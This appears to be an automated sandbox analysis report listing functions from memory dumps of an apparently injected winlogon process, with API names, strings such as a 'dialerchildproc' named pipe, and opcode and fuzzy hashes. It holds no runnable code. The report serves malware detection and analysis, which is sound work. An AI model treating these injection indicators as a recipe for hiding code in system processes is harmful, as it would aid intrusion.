                                                          • Opcode ID: 9cfecb073a77c82b5205d4ec5f6c3b841c922ed377687b22fe55079c845d3249
                                                          • Instruction ID: b40527c8b914558b478dfab4642fda96873c4a3b82ba89e511e1485228043c09
                                                          • Opcode Fuzzy Hash: 9cfecb073a77c82b5205d4ec5f6c3b841c922ed377687b22fe55079c845d3249
                                                          • Instruction Fuzzy Hash: 32E18372604BC08AEB20DFA6D88839D77A8F755B98F900116EE8D57FA5CB38C991C700
                                                          Function 000002D0165EA974 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 97224decaf04aa8a96cad19aafa8d0fc2d444fbfe93f120d80d8953d06d5a995
                                                          • Instruction ID: 17b2e46a5adb7301b2a16f1b18d056b7e51783f2a98078d2ad4c8b0d1243037a
                                                          • Opcode Fuzzy Hash: 97224decaf04aa8a96cad19aafa8d0fc2d444fbfe93f120d80d8953d06d5a995
                                                          • Instruction Fuzzy Hash: D5E18172604BC08AEF20DFB5D98839DB7A4F745B98F944516EE8D57BA9CB35CA80C700
                                                          Function 000002D0165EF7C4 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeLibraryProc
                                                          • String ID: api-ms-$ext-ms-
                                                          • API String ID: 3013587201-537541572
                                                          • Opcode ID: 00167ab4370d744fa0294c6334099228d3e91a4042df4aa134bc83b99d5d7789
                                                          • Instruction ID: 0502c5113662f2a3a9a5d4d251263c5911824315a05688cff6cf68844e12e38b
                                                          • Opcode Fuzzy Hash: 00167ab4370d744fa0294c6334099228d3e91a4042df4aa134bc83b99d5d7789
                                                          • Instruction Fuzzy Hash: 2841F321315A8091FF16CFAAAC88755A395BB45BA0FC8412B9D4E877A4EF3ACE45C340
                                                          Function 000002D0165E104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                          • String ID: d
                                                          • API String ID: 3743429067-2564639436
                                                          • Opcode ID: 4fe3aae0cbb599a1eee1f2be40b2bdf186d2f5bad4b5f62f31428b11ea11a368
                                                          • Instruction ID: 57c1a81412e766fec711e6397f0191dcb9f2e6ca8c99996e7c9a6a9e6f97b5bd
                                                          • Opcode Fuzzy Hash: 4fe3aae0cbb599a1eee1f2be40b2bdf186d2f5bad4b5f62f31428b11ea11a368
                                                          • Instruction Fuzzy Hash: 2B416573614BC0C6EB64CFA1E84879EB7A1F388B99F448116DA8D07768DF39C945CB40
                                                          Function 000002D0165ED498 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • FlsGetValue.KERNEL32(?,?,?,000002D0165ECC0E,?,?,?,?,?,?,?,?,000002D0165ED3CD,?,?,00000001), ref: 000002D0165ED4B7
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D0165ECC0E,?,?,?,?,?,?,?,?,000002D0165ED3CD,?,?,00000001), ref: 000002D0165ED4D6
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D0165ECC0E,?,?,?,?,?,?,?,?,000002D0165ED3CD,?,?,00000001), ref: 000002D0165ED4FE
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D0165ECC0E,?,?,?,?,?,?,?,?,000002D0165ED3CD,?,?,00000001), ref: 000002D0165ED50F
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D0165ECC0E,?,?,?,?,?,?,?,?,000002D0165ED3CD,?,?,00000001), ref: 000002D0165ED520
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID: 1%$Y%
                                                          • API String ID: 3702945584-1395475152
                                                          • Opcode ID: 414de4670033e7547a0a5b3bdda6d862915786416a62f5675f2ee32494ca94ec
                                                          • Instruction ID: c9533fc29eaa90fd43d0fafe31dbb0b9db58d701bccea4bab299a4df71c1c529
                                                          • Opcode Fuzzy Hash: 414de4670033e7547a0a5b3bdda6d862915786416a62f5675f2ee32494ca94ec
                                                          • Instruction Fuzzy Hash: 491181227452C441FF5897E9ADCD339E2419B843B4FC4432BE83E0A6F6DE2ACE424600
                                                          Function 000002D0165E2334 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                          • String ID: \\.\pipe\dialerchildproc
                                                          • API String ID: 166002920-1933775637
                                                          • Opcode ID: 46ac6f3595cd08ba72cfe16ac14249d71bcf4bf6cdab2aa291378c72e2095538
                                                          • Instruction ID: 486f21b42584047a8dbd0fd249b04f4d120b002e740eb6a919f711e2c29be054
                                                          • Opcode Fuzzy Hash: 46ac6f3595cd08ba72cfe16ac14249d71bcf4bf6cdab2aa291378c72e2095538
                                                          • Instruction Fuzzy Hash: 3F115E32614B9083E710CB61F88875A7765F389BE5F904316EA5E02BA8CFBCC948CB04
                                                          Function 000002D0165E7940 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID:
                                                          • API String ID: 190073905-0
                                                          • Opcode ID: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                          • Instruction ID: 91afba1748d56d779d5f9f2092c3f3038b410f7bb8feb96aa5ac84da837e85c9
                                                          • Opcode Fuzzy Hash: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                          • Instruction Fuzzy Hash: A581B2217006C186FF54ABE59CC93B9E291AB85780FD4406BEA5D477B6EB3ACF45C700
                                                          Function 000002D0165EA1F4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(?,?,?,000002D0165EA3B3,?,?,?,000002D0165E9B9C,?,?,?,?,000002D0165E96BD), ref: 000002D0165EA279
                                                          • GetLastError.KERNEL32(?,?,?,000002D0165EA3B3,?,?,?,000002D0165E9B9C,?,?,?,?,000002D0165E96BD), ref: 000002D0165EA287
                                                          • LoadLibraryExW.KERNEL32(?,?,?,000002D0165EA3B3,?,?,?,000002D0165E9B9C,?,?,?,?,000002D0165E96BD), ref: 000002D0165EA2B1
                                                          • FreeLibrary.KERNEL32(?,?,?,000002D0165EA3B3,?,?,?,000002D0165E9B9C,?,?,?,?,000002D0165E96BD), ref: 000002D0165EA2F7
                                                          • GetProcAddress.KERNEL32(?,?,?,000002D0165EA3B3,?,?,?,000002D0165E9B9C,?,?,?,?,000002D0165E96BD), ref: 000002D0165EA303
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                          • String ID: api-ms-
                                                          • API String ID: 2559590344-2084034818
                                                          • Opcode ID: c60201aec778344204bcef1649fbeec24da53dc38ebde7e62b727d681ed7f771
                                                          • Instruction ID: 5592ec4faebcf409305b4b2890a21ef29463e234aef555377722e5be50b850f7
                                                          • Opcode Fuzzy Hash: c60201aec778344204bcef1649fbeec24da53dc38ebde7e62b727d681ed7f771
                                                          • Instruction Fuzzy Hash: 0931CA31312BD0D2EF129BE6AC88755A394B758B60FD90626DD1E173B1EF3ACA458310
                                                          Function 000002D0165F41E4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                          • String ID: CONOUT$
                                                          • API String ID: 3230265001-3130406586
                                                          • Opcode ID: 825ce686359a22e25232def11d6f08b48dee252c530cecc749e4dc9d381a3549
                                                          • Instruction ID: 1ab61b0cf0c9db4a56c2668a424dfc859a79e6a8f03fae7eefaa9eff8ed4efeb
                                                          • Opcode Fuzzy Hash: 825ce686359a22e25232def11d6f08b48dee252c530cecc749e4dc9d381a3549
                                                          • Instruction Fuzzy Hash: 8A118231310B9086E7508BE2FC88319B6A4F788FE5F94426AEA5E877B4DF79CD048744
                                                          Function 000002D0165E31CC Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID: dialer
                                                          • API String ID: 756756679-3528709123
                                                          • Opcode ID: b0319cbd86f06d073dcced0acdf6bc1c6042bb64f80e9fc0b828a3d11e191795
                                                          • Instruction ID: 83f44d16bcc7c953f433701ed3b21392eed8fb092a97d38f6cb15fabea07f430
                                                          • Opcode Fuzzy Hash: b0319cbd86f06d073dcced0acdf6bc1c6042bb64f80e9fc0b828a3d11e191795
                                                          • Instruction Fuzzy Hash: AB318422701B9182EF50DFE6ED88769A3A0FB64B80F8440269E8C47B76DF35DD658740
                                                          Function 000002D0165ED3D0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,?,000002D0165EDAE5,?,?,?,?,000002D0165EDBA8), ref: 000002D0165ED3DF
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D0165EDAE5,?,?,?,?,000002D0165EDBA8), ref: 000002D0165ED415
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D0165EDAE5,?,?,?,?,000002D0165EDBA8), ref: 000002D0165ED442
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D0165EDAE5,?,?,?,?,000002D0165EDBA8), ref: 000002D0165ED453
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D0165EDAE5,?,?,?,?,000002D0165EDBA8), ref: 000002D0165ED464
                                                          • SetLastError.KERNEL32(?,?,?,000002D0165EDAE5,?,?,?,?,000002D0165EDBA8), ref: 000002D0165ED47F
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Value$ErrorLast
                                                          • String ID:
                                                          • API String ID: 2506987500-0
                                                          • Opcode ID: 7fc5e4c2f951738899047b95e00f4424a4026db9f78df7ad039e65ab4a94a20b
                                                          • Instruction ID: e7f75237d409834f9270787a9ddfca5b93ce218f773e8bdf0e17015f71c3d2ee
                                                          • Opcode Fuzzy Hash: 7fc5e4c2f951738899047b95e00f4424a4026db9f78df7ad039e65ab4a94a20b
                                                          • Instruction Fuzzy Hash: 1C1181222452C041FF54A3F99DCD32DE2425B447F0F94432BA87E07AF6DE6ADE414200
                                                          Function 000002D0165E1934 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID:
                                                          • API String ID: 517849248-0
                                                          • Opcode ID: b82d1bbac2a4a5b9d6dbe5f2df15dcec51c980f52b633491719cdad5f7bdf37e
                                                          • Instruction ID: 4c731cbfdfe852defde7cbefce4d1ab1dca6f69176fd26bd62420e10787de74a
                                                          • Opcode Fuzzy Hash: b82d1bbac2a4a5b9d6dbe5f2df15dcec51c980f52b633491719cdad5f7bdf37e
                                                          • Instruction Fuzzy Hash: 7D018021304B9082EB20DBA2EC9C75963A5F788FC1F984176DE8D83764DE3DC989C750
                                                          Function 000002D0165E3B0C Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                          • String ID:
                                                          • API String ID: 449555515-0
                                                          • Opcode ID: 8662155c9f7376030badf6deb1f9cc8df7edcdadcbb5a73039a50034e0df76dd
                                                          • Instruction ID: db5adb49f1b7d242ecc1ff3c97efdbb4f761815ae82f0539aa4f5c8e4211eca5
                                                          • Opcode Fuzzy Hash: 8662155c9f7376030badf6deb1f9cc8df7edcdadcbb5a73039a50034e0df76dd
                                                          • Instruction Fuzzy Hash: 40018C34611B9482EF219BA2EC8CB1A73A9BB48B41F94442ADD4D077B5EF3DCD488710
                                                          Function 000002D0165E9418 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                          • String ID: csm$f
                                                          • API String ID: 2395640692-629598281
                                                          • Opcode ID: 124d9c0b905e6e6f2e62f9bd05bcfd16d2c666ef5833f5a39d15387171bb82e0
                                                          • Instruction ID: 261a320c93590906417959c0e00bb8db65f3674152eb288c157b2766e248c12c
                                                          • Opcode Fuzzy Hash: 124d9c0b905e6e6f2e62f9bd05bcfd16d2c666ef5833f5a39d15387171bb82e0
                                                          • Instruction Fuzzy Hash: BF51B0326116908AEF24CF65EC88B59B7A5F740B89F908127DE5E47798EB36DE41C700
                                                          Function 000002D016588835 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 135COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000003.2231390678.000002D016580000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_3_2d016580000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                          • String ID: displacement map'$csm$f
                                                          • API String ID: 3242871069-3478954885
                                                          • Opcode ID: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                          • Instruction ID: c171492b1571ac84152a0bc2ad70f6ed9fdebf7f741930861dea7dd95c6598aa
                                                          • Opcode Fuzzy Hash: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                          • Instruction Fuzzy Hash: A951D3327126808BEB14CF96FC88B183799F340BD8F928122DA8E43BA8DB74CD41C701
                                                          Function 000002D016588818 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000003.2231390678.000002D016580000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_3_2d016580000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                          • String ID: displacement map'$csm$f
                                                          • API String ID: 3242871069-3478954885
                                                          • Opcode ID: 83240c1be95a85a2168ddca1a7ce1f874f475d626e55e81d58b9bdf2105a26fb
                                                          • Instruction ID: 9283a21ec75857c9312e7aa528c38f2aa51bb37eda7f0ac0048f89cce66190ce
                                                          • Opcode Fuzzy Hash: 83240c1be95a85a2168ddca1a7ce1f874f475d626e55e81d58b9bdf2105a26fb
                                                          • Instruction Fuzzy Hash: F6318B322016C0D6E714DF92FC88B1937A8F740BD8F968416AE9E07BA9CB38CD41CB04
                                                          Function 000002D0165E19D8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FinalHandleNamePathlstrlen
                                                          • String ID: \\?\
                                                          • API String ID: 2719912262-4282027825
                                                          • Opcode ID: d5ec68f96dae6b7ecf4cdbbeb250ae8ba7b628e03b919f4631671672637286c6
                                                          • Instruction ID: fd964db9a84d4bb375de0aedce81a24ee7f98beb5ec0a0efeb79b1a2d33cd7e4
                                                          • Opcode Fuzzy Hash: d5ec68f96dae6b7ecf4cdbbeb250ae8ba7b628e03b919f4631671672637286c6
                                                          • Instruction Fuzzy Hash: 2DF04F623446C192EB308F61FDD87A9A360F744B99FC44022DA4D475A4DE7DCA8CCB10
                                                          Function 000002D0165E330C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CombinePath
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3422762182-91387939
                                                          • Opcode ID: e19f02f46d5f5175cba9bea6f0663c254bbceec99479fcaac31b51916b51a9ba
                                                          • Instruction ID: c344033dd0d2eb744401732b52d51cb32e72f8a85aad8a03c531d78be5b51dda
                                                          • Opcode Fuzzy Hash: e19f02f46d5f5175cba9bea6f0663c254bbceec99479fcaac31b51916b51a9ba
